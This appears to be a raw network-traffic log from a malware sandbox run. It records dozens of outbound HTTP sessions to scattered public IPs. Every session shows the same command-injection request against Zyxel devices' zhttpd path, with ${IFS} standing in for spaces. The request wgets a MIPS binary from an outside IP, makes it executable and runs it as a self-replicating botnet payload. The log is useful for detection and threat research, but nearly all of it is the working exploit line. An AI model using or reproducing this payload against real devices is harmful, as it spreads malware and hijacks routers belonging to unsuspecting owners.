                                      Jan 19, 2024 17:29:31.748837948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4110192.168.2.1432936202.252.209.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.748884916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4111192.168.2.1436136120.182.152.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.748898029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4112192.168.2.1454798219.233.45.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.748900890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4113192.168.2.146037695.220.155.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.748933077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4114192.168.2.1434474154.85.12.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.748967886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4115192.168.2.1446314142.58.250.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.748971939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4116192.168.2.144745244.13.8.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.749011993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4117192.168.2.143877893.120.73.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.749039888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4118192.168.2.1440396186.170.192.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.749093056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4119192.168.2.145583283.228.214.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.749120951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4120192.168.2.1439582110.22.59.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.749177933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4121192.168.2.1435324115.46.235.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.749200106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4122192.168.2.145378041.119.68.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.749255896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4123192.168.2.143404488.115.124.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.749286890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4124192.168.2.145864058.69.41.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.749339104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4125192.168.2.145240484.207.255.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.749362946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4126192.168.2.145217487.112.3.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.749397993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4127192.168.2.1458894204.233.0.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.749419928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4128192.168.2.145600635.213.232.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.749442101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4129192.168.2.1450160129.53.42.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.749483109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4130192.168.2.146052271.236.28.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.749557018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4131192.168.2.145679284.247.34.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.749587059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4132192.168.2.144036875.24.217.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.749613047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4133192.168.2.143374232.36.211.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.749656916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4134192.168.2.143969858.187.135.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.749671936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4135192.168.2.1433344146.182.238.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.749727964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4136192.168.2.1441002181.43.43.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.749753952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4137192.168.2.1458810139.177.34.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.749805927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4138192.168.2.144066623.234.227.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.749871969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4139192.168.2.143567693.156.71.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.749871969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4140192.168.2.1434512216.229.21.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.749921083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4141192.168.2.1442428125.206.129.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.749970913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4142192.168.2.143715840.65.105.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.750005007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4143192.168.2.14529262.214.73.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.750050068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4144192.168.2.145011694.124.173.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.750062943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4145192.168.2.1459292159.16.88.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.750119925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4146192.168.2.1452472155.231.62.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.750169039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4147192.168.2.1451038218.206.216.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.750217915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4148192.168.2.143779096.228.90.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.750256062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4149192.168.2.1440740154.27.245.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.750283003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4150192.168.2.1453426169.85.169.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.750322104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4151192.168.2.14501224.67.140.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.750376940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4152192.168.2.1434436153.229.226.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.750401974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4153192.168.2.143954659.95.233.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.750442028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4154192.168.2.143314697.74.2.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.750473022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4155192.168.2.145965438.237.203.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.750508070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4156192.168.2.145466436.217.249.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.750541925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4157192.168.2.1437258136.201.189.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.750597954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4158192.168.2.1438650123.26.48.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.750621080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4159192.168.2.1434130131.36.46.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.750674963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4160192.168.2.1438782140.133.210.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.750732899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4161192.168.2.1456444142.137.220.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.750773907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4162192.168.2.1441414157.128.255.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.750796080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4163192.168.2.145131463.18.151.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.750847101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4164192.168.2.1435998102.75.251.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.750874996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4165192.168.2.1460082173.238.164.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.750900984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4166192.168.2.1443058191.96.186.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.750962019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4167192.168.2.1435726100.5.230.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.750978947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4168192.168.2.145860264.40.114.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.751009941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4169192.168.2.1440528168.145.3.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.751068115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4170192.168.2.143364874.88.160.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.751096964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4171192.168.2.1453298169.54.118.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.751136065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4172192.168.2.1452684115.172.247.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.751188993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4173192.168.2.1438616165.248.206.206443
                                      TimestampBytes transferredDirectionData
